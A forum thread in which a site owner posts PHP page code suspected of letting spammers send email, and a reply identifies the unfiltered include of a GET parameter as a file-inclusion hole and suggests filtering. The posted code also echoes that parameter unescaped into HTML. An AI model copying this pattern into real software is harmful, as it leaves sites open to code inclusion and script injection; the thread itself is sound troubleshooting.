Jump to content

Security Issues With This Code?


mikebrum
 Share

Recommended Posts

I've been told (by our hosting) that there might be a security issue with this code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><?php include_once('includes/header.php'); ?><body><div id="wrapper">	<?php include_once('includes/navigation.php'); ?>	<a id="top"></a>	<div id="header">		<?php include_once('includes/headerLeft.php'); ?>		<div id="headerRight">		<?php 			$pg = $_GET['pg']; 			if ($pg == '') { $pg = 'home'; }		?>			<img src="images/<?php echo $pg; ?>.jpg" alt="" />		</div>	</div>	<div id="content">				<?php include_once($pg . '.php'); ?>				</div>	<?php include_once('includes/footer.php'); ?></div></body></html>

We've been told that e-mails were sent (through this code) on our behalf.Any help would be appreciated and thank you in advance for your help!Mike

Link to comment
Share on other sites

Well, you are basically allowing the user to include any PHP file they want through this line:

<?php include_once($pg . '.php'); ?>

You could negate that by filtering the input (e.g. only allowing certain values or removing forward slashes).

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...